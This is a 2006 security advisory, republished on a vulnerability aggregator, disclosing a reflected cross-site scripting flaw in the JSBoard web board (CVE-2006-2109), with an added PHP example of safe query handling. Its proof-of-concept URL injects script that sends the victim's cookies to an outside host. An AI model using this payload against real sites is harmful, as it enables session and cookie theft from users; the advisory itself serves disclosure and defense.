aklink-sa-2006-001-jsboard-xss.txt

Published: 05 May 2006 00:00:00
Reported by: Alexander Klink
Type: packetstorm
Source: packetstormsecurity.com

JSBoard - Cross Site Scripting Attack. Date: 02.05.2006, Vendor: JoungKyun Kim, Vulnerability: Non-persistent XSS attack, Severity: low (possible disclosure of session and other cookies), Patched version 2.0.12 availabl

Related

| Reporter | Title | Published |
| --- | --- | --- |
| CVE | CVE-2006-2109 | 2 May 2006 10:00 |
| Cvelist | CVE-2006-2109 | 2 May 2006 10:00 |
| EUVD | EUVD-2006-2110 | 7 Oct 2025 00:30 |
| NVD | CVE-2006-2109 | 2 May 2006 10:02 |
| Prion | Cross site scripting | 2 May 2006 10:02 |
| securityvulns | JSBoard XSS vulnerability | 2 May 2006 00:00 |

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
============================================  
||| Security Advisory AKLINK-SA-2006-001 |||  
||| CAN-2006-2109 (CVE candidate) |||  
============================================  
  
JSBoard - Cross Site Scripting Attack  
=====================================  
  
Date released: 02.05.2006  
Date reported: 30.04.2006  
$Revision: 1.1 $  
  
by Alexander Klink  
[email protected]  
https://www.klink.name/security/aklink-sa-2006-001-jsboard-xss.txt  
(TLS certificate information: https://www.klink.name/tls.txt)  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-2109  
  
Vendor: JoungKyun Kim (Open Source)  
Product: JSBoard - a news and discussion web board popular in Korea  
Website: http://jsboard.kldp.org  
Vulnerability: Non-persistent XSS attack  
Class: remote  
Status: patched  
Severity: low (possible disclosure of session and other cookies)  
Releases known to be affected: 2.0.11, 2.0.10  
Releases known NOT to be affected: 2.0.12  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Overview:  
  
A non-persistent XSS attack can be carried out using variables that  
are supposed to be from included files but can be overwritten using  
variables defined in the CGI query.  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Technical details:  
  
In the function parse_query_str() in include/print.php every variable  
from the CGI request is set as a global variable, regardless of prior  
use. As parse_query_str() is typically called after the inclusion of  
other files that define variables which are not changed but output  
in the rest of the program, this allows an attacker to inject XSS  
code, for example Javascript.  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Proof of concept:  
  
http://[target]/jsboard/login.php?table=<script>document.location='http://www.cgi-security.com/cgi-bin/cookie.cgi'%2Bdocument.cookie</script>  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Workaround:  
  
None known.  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Communication:  
  
* 30.04.2006: Problem reported to author  
* 30.04.2006: Author replies and releases patched version 2.0.12  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Solution:  
  
Install JSBoard 2.0.12, which fixes this particular attack vector.  
Note that CGI query variables are still imported into the global  
namespace, which means a similar problem might appear in a later version.  
The patch is available from:  
http://kldp.net/frs/download.php/3346/2.0.11-2.0.12.patch.tar.gz  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Credit:  
  
Alexander Klink (discovery)  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.5 (GNU/Linux)  
  
iD8DBQFEVs008Q3kKmNSxUURAoNLAJ0bnP+eZ2x4O3Nj57cMtLZKam6tqwCffCdv  
Z7Jztkr1x7zn/uOaHy+rTSs=  
=k/y4  
-----END PGP SIGNATURE-----  
  
`
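
The pattern described under "Technical details", and the caveat in "Solution" that query variables are still imported into the global namespace, shown as an added PHP example that is not JSBoard's code. The function names `import_query_unsafe`, `import_query_safe` and `h`, the allowlist pattern and the sample values are hypothetical and constructed for illustration.

```php
<?php
// Added illustration; not JSBoard source. All names below are hypothetical.

// Vulnerable pattern: every request variable becomes a global, even when an
// included file already defined it (the behaviour the advisory describes).
function import_query_unsafe(array $query): void
{
    foreach ($query as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// Hardened pattern: only allowlisted names are read, each one is validated,
// and nothing is written into the global namespace.
function import_query_safe(array $query, array $allowed): array
{
    $clean = [];
    foreach ($allowed as $name => $pattern) {
        if (isset($query[$name]) && is_string($query[$name])
            && preg_match($pattern, $query[$name]) === 1) {
            $clean[$name] = $query[$name];
        }
    }
    return $clean;
}

// Encode for the HTML context at the point of output.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request: a "table" parameter carrying markup instead of a name.
$query = ['table' => '<script>alert(1)</script>'];

// Value set by an "included file" before the query string is parsed.
$table = 'notice';
import_query_unsafe($query);
echo "unsafe: <b>$table</b>\n";   // trusted value overwritten, raw markup emitted

$table = 'notice';
$in = import_query_safe($query, ['table' => '/\A[A-Za-z0-9_]{1,32}\z/']);
$shown = $in['table'] ?? $table;  // rejected input falls back to the trusted value
echo 'safe:   <b>' . h($shown) . "</b>\n";
```

Validation on input and encoding on output are independent controls: the allowlist stops request data from replacing values that included files define, and `h()` keeps any value that does reach the page from being interpreted as markup.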

Vulners AI Score: 6.7 (Medium risk)
EPSS: 0.07101